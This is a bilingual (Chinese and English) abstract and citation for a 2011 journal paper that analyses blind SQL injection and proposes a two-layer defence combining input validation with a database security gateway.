摘要
随着W eb应用技术越来越复杂,SQL注入攻击,尤其是SQL盲注已经成为当前最流行的数据库攻击手段之一。分析了SQL盲注的原理和攻击过程,重点提出一种双重混合防御模式,即在W eb服务器层使用输入验证全面减少W eb站点的注入可能,随后在数据库层部署安全网关实时过滤注入攻击语句。实验表明,该混合防御模块能对W eb站点的注入漏洞进行有效防护,提升了W eb应用安全性能。
As the Web applications become more extensive,the SQL injection attack especially blind injection come to be the most popular method for database hacking.The fundamental principles and attacking process of blind injection are analyzed,and then proposed a design of duplex prevention.The first step was using the input validation to decreasing the risk of SQL injection attack;the second step was deploying a secure gateway tofiltrate the injection sentence.Experiments show that this duplex module makes a effective prevention for injection risk in websites,and increases the security of web applications.
出处
《科学技术与工程》
2011年第13期3104-3107,共4页
Science Technology and Engineering
